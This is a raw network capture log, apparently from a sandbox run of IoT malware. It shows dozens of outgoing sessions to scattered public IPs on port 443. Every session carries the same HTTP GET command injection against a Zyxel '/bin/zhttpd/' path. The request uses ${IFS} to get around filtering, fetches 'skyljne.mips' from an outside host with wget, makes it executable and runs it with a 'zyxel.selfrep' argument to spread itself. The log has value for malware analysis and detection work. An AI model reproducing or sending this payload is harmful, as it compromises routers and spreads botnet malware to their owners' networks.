                                          Jan 14, 2024 15:46:03.748316050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1313192.168.2.233499040.159.8.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748347044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1314192.168.2.2339946132.118.18.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748375893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1315192.168.2.2343330153.155.250.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748383045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1316192.168.2.2347522171.43.129.101443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748426914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1317192.168.2.2339224175.2.109.215443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748451948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1318192.168.2.2342960112.245.196.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748491049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1319192.168.2.2354884144.23.41.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748516083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1320192.168.2.2339720196.46.155.219443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748553038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1321192.168.2.234672448.30.52.115443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748554945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1322192.168.2.2351910114.37.114.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748580933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1323192.168.2.235348681.230.122.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748606920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1324192.168.2.234453420.112.174.150443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748639107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1325192.168.2.2357718208.111.25.90443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748691082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1326192.168.2.2353070135.184.255.22443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748703957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1327192.168.2.2353814138.160.227.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748714924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1328192.168.2.233691039.106.150.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748734951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1329192.168.2.234726290.230.242.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748764992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1330192.168.2.235660445.152.130.247443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748783112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1331192.168.2.2334978186.217.81.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748805046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1332192.168.2.2348402124.199.172.210443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748825073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1333192.168.2.234536070.228.217.81443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748828888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1334192.168.2.234173278.14.255.170443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748852968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1335192.168.2.233999446.8.31.5443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748893976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1336192.168.2.2355888159.128.190.100443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748912096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1337192.168.2.233426444.42.145.244443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748960018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1338192.168.2.23349222.96.164.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748970985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1339192.168.2.233291053.150.218.134443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.748970985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1340192.168.2.234932492.103.9.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749000072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1341192.168.2.2359104154.91.3.59443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749006033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1342192.168.2.235656888.227.138.238443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749044895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1343192.168.2.2335548149.179.99.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749077082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1344192.168.2.2349060145.146.242.226443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749104023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1345192.168.2.2341284148.132.65.200443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749130964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1346192.168.2.234068671.200.142.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749161005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1347192.168.2.2339826100.127.61.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749197960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1348192.168.2.235902638.9.116.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749224901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1349192.168.2.2341802162.177.104.106443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749247074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1350192.168.2.233924638.107.222.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749294043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1351192.168.2.2344046213.49.50.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749326944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1352192.168.2.233888013.64.239.234443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749326944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1353192.168.2.2337390154.213.162.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749346018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1354192.168.2.234385668.3.127.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749382019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1355192.168.2.2351146141.161.102.38443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749418974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1356192.168.2.2355552188.51.103.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749456882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1357192.168.2.235341496.4.145.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749469042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1358192.168.2.2353282100.212.168.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749496937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1359192.168.2.234719224.32.201.44443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749496937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1360192.168.2.2335370185.39.61.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749531984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1361192.168.2.2334910146.220.208.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749536991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1362192.168.2.2357508208.212.23.182443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749568939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1363192.168.2.2335946151.68.54.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749593973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1364192.168.2.2337542159.151.164.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749643087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1365192.168.2.2355696155.24.229.63443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749667883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1366192.168.2.23452304.20.134.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749696016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1367192.168.2.2339634119.202.142.65443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749732971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1368192.168.2.2344374177.194.159.186443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749744892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1369192.168.2.2356444182.214.228.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749758005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1370192.168.2.2354096155.134.7.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749795914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1371192.168.2.2351988177.105.211.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749814987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1372192.168.2.2345040100.14.219.192443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749856949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1373192.168.2.2337092161.39.33.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749883890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1374192.168.2.234947697.72.83.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:03.749913931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1375192.168.2.2360470106.96.131.238443
                                          TimestampBytes transferredDirectionData
